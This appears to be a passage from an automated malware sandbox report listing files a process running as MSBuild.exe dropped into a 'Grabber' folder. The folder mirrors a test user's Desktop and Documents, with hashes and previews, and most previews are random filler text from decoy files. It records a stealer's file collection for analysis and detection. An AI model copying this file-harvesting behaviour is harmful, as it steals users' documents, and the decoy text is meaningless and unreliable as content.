Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\UOOJJOZIRH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\GAOBCVIQIJ.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY\BJZFPPWAPT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZE